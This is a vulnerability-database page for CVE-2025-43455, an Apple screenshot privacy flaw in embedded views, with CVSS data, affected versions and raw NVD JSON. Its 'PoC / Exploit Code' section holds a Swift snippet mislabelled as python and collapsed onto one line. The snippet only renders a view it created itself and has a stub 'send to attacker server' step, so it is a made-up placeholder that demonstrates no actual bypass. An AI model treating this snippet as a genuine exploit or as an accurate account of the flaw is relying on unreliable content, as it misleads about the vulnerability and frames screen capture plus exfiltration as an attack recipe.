Security Vulnerability Report
中文
CVE-2025-43455 CVSS 5.5 MEDIUM

CVE-2025-43455

Published: 2025-11-04 02:15:51
Last Modified: 2026-04-02 19:20:49

Description

A privacy issue was addressed with improved checks. This issue is fixed in iOS 26.1 and iPadOS 26.1, macOS Tahoe 26.1, visionOS 26.1, watchOS 26.1. A malicious app may be able to take a screenshot of sensitive information in embedded views.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:* - VULNERABLE
Apple iOS < 26.1
Apple iPadOS < 26.1
Apple macOS Tahoe < 26.1
Apple visionOS < 26.1
Apple watchOS < 26.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-43455 PoC - Sensitive Information Screenshot via Embedded Views // This is a conceptual demonstration for security research purposes import UIKit class MaliciousScreenshotView: UIView { // Malicious app embeds a sensitive view func captureEmbeddedView() { // Step 1: Create target view that should be protected let sensitiveView = createSensitiveDataView() // Step 2: Embed the view in our view hierarchy self.addSubview(sensitiveView) // Step 3: Capture screenshot bypassing security checks // In vulnerable versions, this captures protected embedded content let renderer = UIGraphicsImageRenderer(size: sensitiveView.bounds.size) let screenshot = renderer.image { context in sensitiveView.layer.render(in: context.cgContext) } // Step 4: Exfiltrate the screenshot sendToAttackerServer(screenshot) } private func createSensitiveDataView() -> UIView { // Simulate sensitive information display let view = UIView(frame: CGRect(x: 0, y: 0, width: 300, height: 200)) view.backgroundColor = .white // Add sensitive content labels return view } private func sendToAttackerServer(_ image: UIImage) { // Send captured screenshot to attacker-controlled server print("Screenshot captured - PoC demonstration") } } // Defense: Apple fixed this by adding proper security checks // Users should update to iOS 26.1, iPadOS 26.1, macOS Tahoe 26.1, etc.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43455", "sourceIdentifier": "[email protected]", "published": "2025-11-04T02:15:51.020", "lastModified": "2026-04-02T19:20:49.407", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A privacy issue was addressed with improved checks. This issue is fixed in iOS 26.1 and iPadOS 26.1, macOS Tahoe 26.1, visionOS 26.1, watchOS 26.1. A malicious app may be able to take a screenshot of sensitive information in embedded views."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "6D51AEDC-9086-4010-B3BF-C652D65D09C8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "3981A7BE-BC98-4C6F-AE38-D68839368925"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "7DFD3616-65CA-4E5C-849C-3C20ACBCB610"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "9F9D7F76-13FB-407C-94E5-221B93021568"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125632", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125634", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125638", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125639", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}